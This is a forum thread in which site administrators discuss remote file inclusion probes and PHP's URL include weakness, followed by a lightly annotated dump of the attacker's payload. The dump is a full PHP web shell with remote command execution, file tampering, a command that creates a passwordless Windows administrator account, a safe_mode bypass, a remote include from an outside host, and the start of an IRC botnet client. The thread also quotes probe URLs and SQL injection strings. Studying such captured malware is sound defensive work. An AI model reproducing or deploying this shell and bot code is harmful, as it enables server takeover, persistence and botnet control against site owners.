Weird injection attempts
-
So...We noticed that some script kiddy (or zombie computers) was attempting to pull off some URL-parameter injection on some of our websites. Most often, they tried to change one of the URL parameters to a URL (i.e. http://www.example.com/?var=http://www.1337h4x0r/script.php). When I went to the URL being passed in, I found some PHP code:
<?php echo md5("just_a_test")>
Besides the fact that *none* of our pages are running on PHP, how in the hell is this supposed to work?
Are there pages out there that accept a URL as an argument and then arbitrarily execute whatever code is on that page? Is this some crazy bug in an older version of PHP?
-
It's not a bug, it's a feature! (The "mapping URI parameters to global variables" kind of feature)
PHP has, since a few versions, a framework for handling URI schemes. If any function that expects a local file path as an argument instead receives a string that looks like an URI, it will "automagically" attempt to call up the appropriate scheme handler and let it do the work of retrieving the file. So fopen("/file") would open "file" on the local drive, but fopen("http://example.com/file") would try to download it from example.com, completely transparent to your script.
In PHP's usual foresight and ingenuity, they expanded this mechanism to fancier functions as well - like include(). Combine that with a call to, let's say [code]include($_GET["module"] . "/init.php");[/code] in Joe Braindead's PHP script and you got your function on the silver table.
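Added example, not part of the post above and not code from any of the sites mentioned: the include() pattern it describes, with the request parameter reduced to a lookup key in a fixed list so that a URL can never reach include(). The module names, `resolve_module()` and the temporary demo directory are assumptions made for the illustration.

```php
<?php
declare(strict_types=1);

// Vulnerable pattern from the post, kept as a comment so it never runs:
//   include($_GET["module"] . "/init.php");
// When URL wrappers are allowed for include (php.ini allow_url_include=On),
// a parameter that looks like a URL is fetched and executed as PHP.
// allow_url_include is Off by default since PHP 5.2; keep it that way.

// Hypothetical module names for this example; a real application lists its own.
const ALLOWED_MODULES = ['news', 'gallery', 'contact'];

/**
 * Map a request parameter to a local init.php path, or return null.
 * The parameter is only used as a lookup key, never as a path fragment.
 */
function resolve_module($requested, string $baseDir): ?string
{
    // Arrays (?module[]=x), URLs, "../" sequences and typos all end here.
    if (!is_string($requested) || !in_array($requested, ALLOWED_MODULES, true)) {
        return null;
    }

    $root = realpath($baseDir);
    $path = realpath($baseDir . '/' . $requested . '/init.php');
    // realpath() returns false when the file does not exist locally.
    if ($root === false || $path === false) {
        return null;
    }

    // Defence in depth: the resolved file must still sit under the module root,
    // which also catches a symlink planted inside an allowed directory.
    $prefix = $root . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo: build a throwaway module tree, then try three inputs.
$base = sys_get_temp_dir() . '/rfi_demo_' . bin2hex(random_bytes(4));
mkdir($base . '/news', 0700, true);
file_put_contents($base . '/news/init.php', "<?php return 'news loaded';\n");

$samples = [
    'news',                               // legitimate module name
    'http://www.1337h4x0r/script.php',    // probe shape quoted in the thread
    '../../etc/passwd',                   // path traversal attempt
];

foreach ($samples as $value) {
    $path = resolve_module($value, $base);
    if ($path === null) {
        // In a real handler: log the request and answer 404.
        printf("%-34s -> rejected\n", $value);
        continue;
    }
    $result = include $path;
    printf("%-34s -> included %s (%s)\n", $value, basename(dirname($path)), $result);
}

// Remove the demo tree again.
unlink($base . '/news/init.php');
rmdir($base . '/news');
rmdir($base);
```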
-
I expect they're probing for XSS holes. If they find a way to inject html goop into your pages, the real attack would contain a chunk of javascript instead.
-
@PSWorx said:
It's not a bug, it's a feature! (The "mapping URI parameters to global variables" kind of feature)
PHP has, since a few versions, a framework for handling URI schemes. If any function that expects a local file path as an argument instead receives a string that looks like an URI, it will "automagically" attempt to call up the appropriate scheme handler and let it do the work of retrieving the file. So fopen("/file") would open "file" on the local drive, but fopen("http://example.com/file") would try to download it from example.com, completely transparent to your script.
In PHP's usual foresight and ingenuity, they expanded this mechanism to fancier functions as well - like include(). Combine that with a call to, let's say [code]include($_GET["module"] . "/init.php");[/code] in Joe Braindead's PHP script and you got your function on the silver table.
Ah, that makes sense. Still, you'd have to be pretty damn stupid to write code that gets filenames from URL parameters...yikes!
-
@bighusker said:
@PSWorx said:
It's not a bug, it's a feature! (The "mapping URI parameters to global variables" kind of feature)
PHP has, since a few versions, a framework for handling URI schemes. If any function that expects a local file path as an argument instead receives a string that looks like an URI, it will "automagically" attempt to call up the appropriate scheme handler and let it do the work of retrieving the file. So fopen("/file") would open "file" on the local drive, but fopen("http://example.com/file") would try to download it from example.com, completely transparent to your script.
In PHP's usual foresight and ingenuity, they expanded this mechanism to fancier functions as well - like include(). Combine that with a call to, let's say [code]include($_GET["module"] . "/init.php");[/code] in Joe Braindead's PHP script and you got your function on the silver table.
Ah, that makes sense. Still, you'd have to be pretty damn stupid to write code that gets filenames from URL parameters...yikes!
I see you're new to this site.
-
I've been getting the same thing. It happens 5 times a day within 5 minutes, always around 10am. We're getting two things happening.
http://www.company.com/pcc/index.aspx?lnkID=http://www.sectoranime.com.mx/galeria/include/nokuc/kef/&imgID=PCC_conferences.jpg threw an error message.
and
your usual SQL injection attempts.
http://www.masspartnership.com/about/index.aspx?imgid=newsandevents.jpg&lnkid=newsandevents.ascx' and user>0 and ''=' threw an error message.
Going to the URLs shown always shows the same bit of PHP code. <?php echo md5("just_a_test")>
I've got a list of 10 sites that they try to pass.
-
found this on the web
Guest : 162.39.119.102 : July 12, 2007, 05:40:08 AM
/forums/index.php?board=15;action=display;threadid=2286/Sources/Packages.php?sourcedir=http://members.lycos.co.uk/kalafi0r/asd.txt???
kalafi0r seems to be some Polish script kiddy. On the move:
http://security.pigstye.net/staticpages/index.php/index
$ nslookup 162.39.119.102
Server: 216.201.118.101
Address: 216.201.118.101#53
Non-authoritative answer:
102.119.39.162.in-addr.arpa name = h102.119.39.162.ip.alltel.net.
TRACE:
traceroute to h102.119.39.162.ip.alltel.net (162.39.119.102), 30 hops max, 38 byte packets
...
6 tbr2.attga.ip.att.net (12.122.10.137) 59.477 ms 55.821 ms 55.611 ms
MPLS Label=31746 CoS=3 TTL=1 S=0
7 gar5.attga.ip.att.net (12.123.20.181) 54.272 ms 54.308 ms 55.562 ms
8 12.118.120.118 (12.118.120.118) 54.081 ms 58.049 ms 85.980 ms
9 h121.21.213.151.ip.alltel.net (151.213.21.121) 63.574 ms 64.787 ms 64.962 ms
10 h54.33.213.151.ip.alltel.net (151.213.33.54) 62.919 ms h58.33.213.151.ip.alltel.net (151.213.33.58) 65.127 ms 64.626 ms
11 h123.21.213.151.ip.alltel.net (151.213.21.123) 70.105 ms h107.21.213.151.ip.alltel.net (151.213.21.107) 108.281 ms h123.21.213.151.ip.alltel.net (151.213.21.123) 68.374 ms
12 mthwnc-7200-2.alltel.net (166.102.102.232) 68.345 ms 68.061 ms 68.389 ms
13 h97.119.39.162.ip.alltel.net (162.39.119.97) 74.313 ms 74.527 ms 77.739 ms
14 h102.119.39.162.ip.alltel.net (162.39.119.102) 79.976 ms 77.663 ms 76.522
Matthews, North Carolina? Not many Poles there, probably a bot-infected win box
This topic doesn't exist on this board. - "2286/Sources/Packages.php?sourcedir=http://members.lycos.co.uk/kalafi0r/asd.txt???"
Our attacker is trying to get our server to include some extra unvalidated PHP code. The Lycos page has the following source:
=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~ malcode ~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=
<html>
<head>
<meta http-equiv="Content-Language" content="pt-br"><!-- FRONTAPAGE, HUH. SOMEONE HAS A SENSE OF HUMOR :) //-->
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="AoD">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><!-- BY POLSKI SCRIPT KIDD, WHO CAN CUT N PASTE REALLY LEET //-->
<title>By destructive > irc.gigachat.net > CMD > File List</title>
<style type="text/css">
A:link {text-decoration:none}
A:visited {text-decoration:none}
A:hover {text-decoration:underline}
A:active {text-decoration:underline}
</style>
</head>
<body style="font-family: Tahoma; font-size: 10px">
<?php@set_time_limit(0);
$string = $_SERVER['QUERY_STRING'];
$mhost = 'http://www.avto.bz/lang/.../cmd.txt?';
// NOT SURE WHAT WE'RE EXPLODING HERE, AVTO.BZ DOESN'T RESOLVE
// ALTHOUGH, THE GOOGLE CACHE SHOWS ITS GHOST:
// http://64.233.169.104/search?q=cache:J3mih5icxVEJ:www.avto.bz/links.php+"avto.bz"&hl=en&ct=clnk&cd=7&gl=us$host_all = explode("$mhost", $string);
$s1 = $host_all[0];// $_SERVER['PHP_SELF'] is filename of the currently executing script
// $fstring WILL BE THE SHORTHAND FOR THE XSS CALL TO OUR SERVER, TO GET IT TO EXECUTE
// ALL OF THE PROGS, FUNCTIONS, ETC$fstring = $_SERVER['PHP_SELF']."?".$s1.$mhost;
$OS = @PHP_OS;
$IpServer = '127.0.0.1';
$UNAME = @php_uname();
$PHPv = @phpversion();
$SafeMode = @ini_get('safe_mode');if ($SafeMode == '') { $SafeMode = "<i>OFF</i>"; }
else { $SafeMode = "<i>$SafeMode</i>"; }// BELOW SOURCES ONLY LOAD SRC FROM http://www.home-equity-loans-1.org/l.php
// CHANGED? ABANDONED?$btname = 'backtool.txt';
$bt = 'http://www.full-comandos.com/jobing/r0nin';
$dc = 'http://www.full-comandos.com/jobing/dc.txt';// LOOKS LIKE WE'RE MAKING WINDOWS ADMIN ACCOUNTS
// LOOK FOR WEBBOT'S INVOCATION OF "$cmd=$newuser"$newuser = '@echo off;net user Admin /add /expires:never /passwordreq:no;net localgroup "Administrators" /add Admin;net localgroup "Users" /del Admin';
// HERE'S SOME JS FILE WRANGLING FUNCTIONS (CHMOD, COPY, CD, RENAME, MKDIR)
// Java Script
echo "<script type="text/javascript">";
echo "function ChMod(chdir, file) {";
echo "var o = prompt('Chmod: - Exemple: 0777', '');";
echo "if (o) {";
echo "window.location="" + '{$fstring}&action=chmod&chdir=' + chdir + '&file=' + file + '&chmod=' + o + "";";
echo "}";
echo "}";
echo "function Rename(chdir, file, mode) {";
echo "if (mode == 'edit') {";
echo "var o = prompt('Rename file '+ file + ' for:', '');";
echo "}";
echo "else {";
echo "var o = prompt('Rename dir '+ file + ' for:', '');";
echo "}";
echo "if (o) {";
echo "window.location="" + '{$fstring}&action=rename&chdir=' + chdir + '&file=' + file + '&newname=' + o + '&mode=' + mode +"";";
echo "}";
echo "}";
echo "function Copy(chdir, file) {";
echo "var o = prompt('Copied for:', '/tmp/' + file);";
echo "if (o) {";
echo "window.location="" + '{$fstring}&action=copy&chdir=' + chdir + '&file=' + file + '&fcopy=' + o + "";";
echo "}";
echo "}";
echo "function Mkdir(chdir) {";
echo "var o = prompt('Which name?', 'NewDir');";
echo "if (o) {";
echo "window.location="" + '{$fstring}&action=mkdir&chdir=' + chdir + '&newdir=' + o + "";";
echo "}";
echo "}";
echo "function Newfile(chdir) {";
echo "var o = prompt('Which name?', 'NewFile.txt');";
echo "if (o) {";
echo "window.location="" + '{$fstring}&action=newfile&chdir=' + chdir + '&newfile=' + o + "";";
echo "}";
echo "}";
echo "</script>";// End JavaScript
/* Functions */ function cmd($CMDs) { $CMD[1] = ''; exec($CMDs, $CMD[1]); if (empty($CMD[1])) { $CMD[1] = shell_exec($CMDs); } elseif (empty($CMD[1])) { $CMD[1] = passthru($CMDs); } elseif (empty($CMD[1])) { $CMD[1] = system($CMDs); } elseif (empty($CMD[1])) { $handle = popen($CMDs, 'r'); while(!feof($handle)) { $CMD[1][] .= fgets($handle); } pclose($handle); } return $CMD[1]; }
if (@$_GET['chdir']) {
$chdir = $_GET['chdir'];
} else {
$chdir = getcwd()."/";
}
if (@chdir("$chdir")) {
$msg = "<font color="#008000">Entrance in the directory, OK!</font>";
} else {
$msg = "<font color="#FF0000">Error to enters it in the directory!</font>";
$chdir = str_replace($SCRIPT_NAME, "", $_SERVER['SCRIPT_NAME']);
}// REPLACE BACKSLASH WITH FWD SLASH, YEP ITS FOR WINDOWS ALLRIGHT
$chdir = str_replace(chr(92), chr(47), $chdir);
// CMD==UPLOAD: DENOTE SUCCESS IF WE UPLOAD OUR BOT CODE SUCCESSFULLY
if (@$_GET['action'] == 'upload') {
$uploaddir = $chdir;//USING HTTP POST TO UPLOAD JUNK ($_FILES)
$uploadfile = $uploaddir. $_FILES['userfile']['name'];
if (@move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $_FILES['userfile']['name'])) {
$msg = "<font color="#008000"><font color="#000080">{$_FILES['userfile']['name']}</font>, the archive is validates and was loaded successfully.</font>";
} else {
$msg = "<font color="#FF0000">Error when copying archive.</font>";
}
}//CMD==MKDIR: MAKE A NEW DIR
elseif (@$_GET['action'] == 'mkdir') {
$newdir = $_GET['newdir'];
if (@mkdir("$chdir"."$newdir")) {
$msg = "<font color="#008000"><font color="#000080">{$newdir}</font>, directory created successfully.</font>";
} else {
$msg = "<font color="#FF0000">Error to it creates directory.</font>";
}
}//CMD==NEWFILE: TOUCH OFF A FILE
elseif (@$_GET['action'] == 'newfile') {
$newfile = $_GET['newfile'];
if (@touch("$chdir"."$newfile")) {
$msg = "<font color="#008000"><font color="#000080">{$newfile}</font>, created successfully!</font>";
} else {
$msg = "<font color="#FF0000">Error to tries it creates archive.</font>";
}
}//CMD==DELETE:
// FILES
elseif (@$_GET['action'] == 'del') {
$file = $_GET['file']; $type = $_GET['type'];
if ($type == 'file') {
if (@unlink("$chdir"."$file")) {
$msg = "<font color="#008000"><font color="#000080">{$file}</font>, successfully excluded archive!</font>";
} else {
$msg = "<font color="#FF0000">Error to it I excluded archive!</font>";
}
// DIRS
} elseif ($type == 'dir') {
if (@rmdir("$chdir"."$file")) {
$msg = "<font color="#008000"><font color="#000080">{$file}</font>, successfully excluded directory!</font>";
} else {
$msg = "<font color="#FF0000">Error to it I excluded directory!</font>";
}
}
}// CMD==CHMOD: 777 SOME FILES
elseif (@$_GET['action'] == 'chmod') {
$file = $chdir.$_GET['file']; $chmod = $_GET['chmod'];
if (@chmod ("$file", $chmod)) {$msg = "<font color=\"#008000\">Chmod&nbsp;of</font>&nbsp;<font color=\"#000080\">{$_GET['file']}</font>&nbsp;<font color=\"#008000\">moved&nbsp;for</font>&nbsp;<font color=\"#000080\">$chmod</font>&nbsp;<font color=\"#008000\">successfully.</font>"; } else { $msg = '<font color=\"#FF0000\">Error&nbsp;when&nbsp;moving&nbsp;chmod.</font>'; }
}
//CMD==RENAME: RENAME
elseif (@$_GET['action'] == 'rename') {
$file = $_GET['file']; $newname = $_GET['newname'];
if (@rename("$chdir"."$file", "$chdir"."$newname")) {
$msg = "<font color="#008000">Archive</font> <font color="#000080">{$file}</font> <font color="#008000">named for</font> <font color="#000080">{$newname}</font> <font color="#008000">successfully!</font>";
} else {
$msg = "<font color="#FF0000">Error to it nominates archive.</font>";
}
}//CMD==COPY: DUPE SOME SHIT
elseif (@$_GET['action'] == 'copy') {
$file = $chdir.$_GET['file']; $copy = $_GET['fcopy'];
if (@copy("$file", "$copy")) {
$msg = "<font color="#000080">{$file}</font>, <font color="#008000">copied for</font> <font color="#000080">{$copy}</font> <font color="#008000">successfully!</font>";
} else {
$msg = "<font color="#FF0000">Error when copying</font> <font color="#000000">{$file}</font> <font color="#FF0000">for</font> <font color="#000000">{$copy}</font></font>";
}
}
/* Parte Atualiza 02:48 12/2/2006 *///CMD==COMMAND: DO SOME SHIT
elseif (@$_GET['action'] == 'cmd') {
if (!empty($_GET['cmd'])) { $cmd = @$_GET['cmd']; }
if (!empty($_POST['cmd'])) { $cmd = @$_POST['cmd']; }$cmd = stripslashes(trim($cmd)); $result_arr = cmd($cmd); $afim = count($result_arr); $acom = 0; $msg = ''; $msg .= "<p style=\"color: #000000;text-align: center;font-family: 'Lucida Console';font-size: 12px;margin 2\">Results:&nbsp;<b>".$cmd."</b></p>"; if ($result_arr) { while ($acom <= $afim) { $msg .= "<p style=\"color: #008000;text-align: left;font-family: 'Lucida Console';font-size: 12px;margin 2\">&nbsp;".@$result_arr[$acom]."</p>"; $acom++; } } else { $msg .= "<p style=\"color: #FF0000;text-align: center;font-family: 'Lucida Console';font-size: 12px;margin 2\">Erro ao executar comando.</p>"; // ERRO AO EXECUTAR COMANDO??? PORTUGUESE HAX0R mebbe? }
}
elseif (@$_GET['action'] == 'safemode') {// CHECKING FOR/USING SHARED MEMORY OPS SO WE CAN
// EXECUTE THE PHP SAFE MODE BYPASS:
// http://securityvulns.com/files/safe_mode_bypass.phpif (@!extension_loaded('shmop')) {
echo "Loading... module</br>";if (strtoupper(substr(PHP_OS, 0,3) == 'WIN')) { @dl('php_shmop.dll'); } else { @dl('shmop.so'); }
}
if (@extension_loaded('shmop')) {
echo "Module: <b>shmop</b> loaded!</br>";// PHP SAFE MODE BYPASS:
$shm_id = @shmop_open(0xff2, "c", 0644, 100);
if (!$shm_id) { echo "Couldn't create shared memory segment\n"; }
$data="\x00";
$offset=-3842685;
$shm_bytes_written = @shmop_write($shm_id, $data, $offset);
if ($shm_bytes_written != strlen($data)) { echo "Couldn't write the entire length of data\n"; }
if (!shmop_delete($shm_id)) { echo "Couldn't mark shared memory block for deletion."; }
echo passthru("id");
shmop_close($shm_id);} else { echo "Module: <b>shmop</b> not loaded!</br>"; }
}// CMD==ZIP FILES
elseif (@$_GET['action'] == 'zipen') {
$file = $_GET['file'];
$zip = @zip_open("$chdir"."$file");
$msg = '';
if ($zip) {while ($zip_entry = zip_read($zip)) { $msg .= "Name: " . zip_entry_name($zip_entry) . "\\n"; $msg .= "Actual Filesize: " . zip_entry_filesize($zip_entry) . "\\n"; $msg .= "Compressed Size: " . zip_entry_compressedsize($zip_entry) . "\\n"; $msg .= "Compression Method: " . zip_entry_compressionmethod($zip_entry) . "\\n"; if (zip_entry_open($zip, $zip_entry, "r")) { echo "File Contents:\\n"; $buf = zip_entry_read($zip_entry, zip_entry_filesize($zip_entry)); echo "$buf\\n"; zip_entry_close($zip_entry); } echo "\\n"; } zip_close($zip);
}
}//CMD==EDIT
elseif (@$_GET['action'] == 'edit') {
$file = $_GET['file'];
$conteudo = '';
$filename = "$chdir"."$file";// read file $filename into string $conteudo
// Conteúdo?? That's Portuguese for "content" y'all - hmmm
// Portuguese?? interesting.....$conteudo = @file_get_contents($filename);
// Convert special characters to HTML entities
$conteudo = htmlspecialchars($conteudo);
//$_SERVER is an array containing information such as headers, paths, and script locations. IT IS PART OF THE register_globals SECURITY FIASCO (right? check my facts here, I'm not 100% on that).
$back = $_SERVER['HTTP_REFERER'];
echo "<p align="center">Editing {$file} ...</p>";
echo "<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="100%" id="editacao">";
echo "<tr>";
echo "<td width="100%">";
echo "<form method="POST" action="{$fstring}&action=save&chdir={$chdir}&file={$file}">";// NOTICE THE REFERENCE TO "webbot" AND ITS LOGFILE: _private/form_results.csv
echo "<!--webbot bot="SaveResults" u-file="_private/form_results.csv" s-format="TEXT/CSV" s-label-fields="TRUE" --><p align="center">";
print "<textarea rows="18" name="S1" cols="89" style="font-family: Verdana; font-size: 10pt; border: 1px solid #000000">{$conteudo}</textarea></p>";
echo "<p align="center">";
echo "<input type="submit" value="Save" name="B2" style="font-family: Tahoma; font-size: 10px; border: 1px solid #000000"> ";
echo "<input type="button" value="Closes Publisher" Onclick="javascript:window.location='{$fstring}&chdir={$chdir}'" name="B1" style="font-family: Tahoma; font-size: 10px; border: 1px solid #000000"> ";
echo "</form>";
echo "</td>";
echo "</tr>";
echo "</table>";
}//CMD==SAVE
elseif (@$_GET['action'] == 'save') {
$filename = "$chdir".$_GET['file'];
$somecontent = $_POST['S1'];
$somecontent = stripslashes(trim($somecontent));
if (is_writable($filename)) {
@$handle = fopen ($filename, "w");
@$fw = fwrite($handle, $somecontent);
@fclose($handle);
if ($handle && $fw) {
$msg = "<font color="#000080">{$_GET['file']}</font>, <font color="#008000">edited successfully!</font>";
}
} else {
$msg = "<font color="#000000">{$_GET['file']},</font> <font color="#FF0000">cannot be written!</font>";
}
}// INVENTORY TIME!!
// Informações
$cmdget = '';
if (!empty($_GET['cmd'])) { $cmdget = @$_GET['cmd']; }
if (!empty($_POST['cmd'])) { $cmdget = @$_POST['cmd']; }
$cmdget = htmlspecialchars($cmdget);
function asdads() {
$asdads = '';// LESSEE WHAT KEWL TOOLS ARE PRELOADED FOR US....
if (@file_exists("/usr/bin/wget")) { $asdads .= "wget "; }
if (@file_exists("/usr/bin/fetch")) { $asdads .= "fetch "; }
if (@file_exists("/usr/bin/curl")) { $asdads .= "curl "; }
if (@file_exists("/usr/bin/GET")) { $asdads .= "GET "; }
if (@file_exists("/usr/bin/lynx")) { $asdads .= "lynx "; }
return $asdads;
}//ID THE SYSTEM OS AND PHP VERSIONS
echo "<form method="POST" name="cmd" action="{$fstring}&action=cmd&chdir=$chdir">";
echo "<fieldset style="border: 1px solid #000000; padding: 2">";
echo "<legend>Informações</legend>";
echo "<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse; font-family: Tahoma; font-size: 10px" width="100%">";
echo "<tr>";
echo "<td width="8%">";
echo "<p align="right"><b>Sistema:</b> </td></p>";
echo "<td width="92%"> {$OS}</td>";
echo "</tr>";
echo "<tr>";
echo "<td width="8%">";
echo "<p align="right"><b>Uname: </b></td></p>";
echo "<td width="92%"> {$UNAME}</td>";
echo "</tr>";
echo "<tr>";
echo "<td width="8%">";
echo "<p align="right"><b>PHP: </b></td></p>";
echo "<td width="92%"> {$PHPv}, <b>safe mode:</b> {$SafeMode}</td>";
echo "</tr>";
if (strtoupper(substr($OS, 0,3) != 'WIN')) {
$Methods = asdads();
if ($Methods == '') { $Methods = "???"; }
echo "<tr>";
echo "<td width="8%">";
echo "<p align="right"><b>Methods: </b></td></p>";
echo "<td width="92%"> {$Methods}</td>";
echo "</tr>";
}echo "<tr>";
echo "<td width="8%">";
echo "<p align="right"><b>Ip: </b></td></p>";
echo "<td width="92%"> {$IpServer}</td>";
echo "</tr>";
echo "<tr>";
echo "<td width="8%">";
echo "<p align="right"><b>Command: </b></td></p>";
echo "<td width="92%"> <input type="text" size="70" name="cmd" value="{$cmdget}" style="font-family: Tahoma; font-size: 10 px; border: 1px solid #000000"> <input type="submit" name="action" value="Send" style="font-family: Tahoma; font-size: 10 px; border: 1px solid #000000"></td>";
echo "</tr>";
echo "</table>";
echo "</fieldset></form>";
// Direcho "<form method="POST" action="{$fstring}&action=upload&chdir=$chdir" enctype="multipart/form-data">";
//webbot upload, mkdir, (use cases, "action=blah")
echo "<!--webbot bot="FileUpload" u-file="_private/form_results.csv" s-format="TEXT/CSV" s-label-fields="TRUE" --><fieldset style="border: 1px solid #000000; padding: 2">";
if (is_writable("$chdir")) {
if (strtoupper(substr($OS, 0,3) == 'WIN')) {
echo "<legend>Dir <b>YES</b>: {$chdir} - <a href="#[New Dir]" onclick="Mkdir('{$chdir}');">[New Dir]</a> <a href="#[New File]" onclick="Newfile('{$chdir}')">[New File]</a> <a href="{$fstring}&action=cmd&chdir={$chdir}&cmd=$newuser">[Remote Access]</a></legend>";
} else {
echo "<legend>Dir <b>YES</b>: {$chdir} - <a href="#[New Dir]" onclick="Mkdir('{$chdir}');">[New Dir]</a> <a href="#[New File]" onclick="Newfile('{$chdir}')">[New File]</a> <a href="{$fstring}&action=backtool&chdir={$chdir}&write=yes">[BackTool]</a></legend>";
}
}
else {
if (strtoupper(substr($OS, 0,3) == 'WIN')) {
echo "<legend>Dir NO: {$chdir} - <a href="#[New Dir]" onclick="Mkdir('{$chdir}');">[New Dir]</a> <a href="#[New File]" onclick="Newfile('{$chdir}')">[New File]</a> <a href="{$fstring}&action=cmd&chdir={$chdir}&cmd={$newuser}">[Remote Access]</a></legend>";
} else {
echo "<legend>Dir NO: {$chdir} - <a href="#[New Dir]" onclick="Mkdir('{$chdir}');">[New Dir]</a> <a href="#[New File]" onclick="Newfile('{$chdir}')">[New File]</a> <a href="{$fstring}&action=backtool&chdir={$chdir}&write=no">[BackTool]</a></legend>";
}
}if (@!$handle = opendir("$chdir")) {
echo " I could not enters in the directory, <a href="{$fstring}">click here!</a> for return to the original directory!</br>";
}
else {
echo " <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse; font-family: Tahoma; font-size: 10px" width="100%">";
echo " <tr>";
echo " <td width="100%" style="font-family: Tahoma; font-size: 10px" colspan="4"> Upload:";
echo " <input type="file" name="userfile" size="91" style="font-family: Tahoma; font-size: 10px; border-style: solid; border-width: 1">";
echo " <input type="submit" value="Send" name="B1" style="font-family: Tahoma; font-size: 10px; border: 1px solid #000000"></td>";
echo " </tr>";
echo " <tr>";
echo " <td width="100%" style="font-family: Tahoma; font-size: 10px" colspan="4"> </td>";
echo " </tr>";
echo " <tr>";
echo " <td width="100%" style="font-family: Tahoma; font-size: 10px" colspan="4">";
if (@!$msg) {
echo " <p align="left">Messages</td>";
} else {
echo " <p align="left">$msg</td>";
}
echo " </tr>";
echo " <tr>";
echo " <td width="100%" colspan="4"> </td>";
echo " </tr>";
echo " <tr>";
echo " <td width="9%"> Perms</td>";
echo " <td width="49%"> File </td>";
echo " <td width="10%"> Size </td>";
echo " <td width="32%"> Commands</td>";
echo " </tr>";
$colorn = 0;
while (false !== ($file = readdir($handle))) {
if ($file != '.') {
if ($colorn == 0) {
$color = "style="background-color: #FFCC66"";
}
elseif ($colorn == 1) {
$color = "style="background-color: #C0C0C0"";
}
if (@is_dir("$chdir"."$file")) {
$file = $file.'/';
$mode = 'chdir';
} else {
$mode = 'edit';
}
if (@substr("$chdir", strlen($chdir) -1, 1) != '/') {
$chdir .= '/';
}
if ($file == '../') {
$lenpath = strlen($chdir); $baras = 0;
for ($i = 0;$i < $lenpath;$i++) { if ($chdir{$i} == '/') { $baras++; } }
$chdir_ = explode("/", $chdir);
$chdirpox = str_replace($chdir_[$baras-1].'/', "", $chdir);
}
$perms = @fileperms ("$chdir"."$file");
if ($perms == '') {
$perms = '???';
}
$size = @filesize ("$chdir"."$file");
$size = $size / 1024;
$size = explode(".", $size);
if (@$size[1] != '') {
$size = $size[0].'.'.@substr("$size[1]", 0, 2);
} else {
$size = $size[0];
}
if ($size == 0) {
if ($mode == 'chdir') {
$size = '???';
}
}
echo "<tr>";
echo "<td width="9%" $color> $perms</td>";
if (@is_writable ("$chdir"."$file")) {
if ($mode == 'chdir') {
if ($file == '../') {
echo "<td width="49%" $color> <b><a href="{$fstring}&chdir=$chdirpox">$file</a></b></td>";
} else {
echo "<td width="49%" $color> <b><a href="{$fstring}&chdir={$chdir}{$file}">$file</a></b></td>";
}
} else {
if (is_readable("$chdir"."$file")) {
echo "<td width="49%" $color> <b><a href="{$fstring}&action=edit&chdir=$chdir&file=$file">$file</a></b></td>";
} else {
echo "<td width="49%" $color> <b>$file</b></td>";
}
}
}
else {
if ($mode == 'chdir') {
if ($file == '../') {
echo "<td width="49%" $color> <a href="{$fstring}&chdir=$chdirpox">$file</a></td>";
} else {
echo "<td width="49%" $color> <a href="{$fstring}&chdir={$chdir}{$file}">$file</a></td>";
}
} else {
if (@is_readable("$chdir"."$file")) {
echo "<td width="49%" $color> <a href="{$fstring}&action=edit&chdir=$chdir&file=$file">$file</a></td>";
} else {
echo "<td width="49%" $color> $file</td>";
}
}
}
echo "<td width="10%" $color> $size KB</td>";
if ($mode == 'edit') {
echo "<td width="32%" $color> <a href="#{$file}" onclick="Rename('{$chdir}', '{$file}', '{$mode}')">[Rename]</a> <a href="{$fstring}&action=del&chdir={$chdir}&file={$file}&type=file">[Del]</a> <a href="#{$file}" onclick="ChMod('$chdir', '$file')">[Chmod]</a> <a href="#{$file}" onclick="Copy('{$chdir}', '{$file}')">[Copy]</a></td>";
} else {
echo "<td width="32%" $color> <a href="#{$file}" onclick="Rename('{$chdir}', '{$file}', '{$mode}')">[Rename]</a> <a href="{$fstring}&action=del&chdir={$chdir}&file={$file}&type=dir">[Del]</a> <a href="#{$file}" onclick="ChMod('$chdir', '$file')">[Chmod]</a> [Copy]</td>";
}
echo "</tr>";
if ($colorn == 0) {
$colorn = 1;
}
elseif ($colorn == 1) {
$colorn = 0;
}
}
}
closedir($handle);
}
include 'http://members.lycos.co.uk/kalafi0r/up.txt?';
?>
</table>
</fieldset></form>
<p align="center">// HEY GREAT!!! AT LEAST CRACKERS CARE ABOUT STANDARDS...
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.w3.org/Icons/valid-html401" alt="Valid HTML 4.01 Transitional" height="31" width="88"></a>
</p>
</body></html>
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
up.txt
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
<?// GOSH THIS LOOKS LIKE http://see-your-ip.info/phpbot.txt
set_time_limit(0);
error_reporting(0);class pBot
{
var $config = array("server"=>"tucows.westlin.com",
"port"=>6667,
"pass"=>"", //senha do server (sendpass to server)
"prefix"=>"elo_bot",
"maxrand"=>8,
"chan"=>"#test",
"key"=>"t3st", //senha do canal (sendpass to channel)
"modes"=>"+p",
"password"=>"root", //senha do bot (sendpass to bot)
"trigger"=>".",
"hostauth"=>"" // * for any hostname
);
var $users = array();
function start()
{
if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30)))
$this->start();
$ident = "";
$alph = range("a","z");
for($i=0;$i<$this->config['maxrand'];$i++)
$ident .= $alph[rand(0,25)];
if(strlen($this->config['pass'])>0)
$this->send("PASS ".$this->config['pass']);
$this->send("USER $ident 127.0.0.1 localhost :$ident");
$this->set_nick();
$this->main();
}
function main()
{
while(!feof($this->conn))
{
$this->buf = trim(fgets($this->conn,512));
$cmd = explode(" ",$this->buf);
if(substr($this->buf,0,6)=="PING :")
{
$this->send("PONG :".substr($this->buf,6));
}
if(isset($cmd[1]) && $cmd[1] =="001")
{
$this->send("MODE ".$this->nick." ".$this->config['modes']);
$this->join($this->config['chan'],$this->config['key']);
}
if(isset($cmd[1]) && $cmd[1]=="433")
{
$this->set_nick();
}
if($this->buf != $old_buf)
{
$mcmd = array();
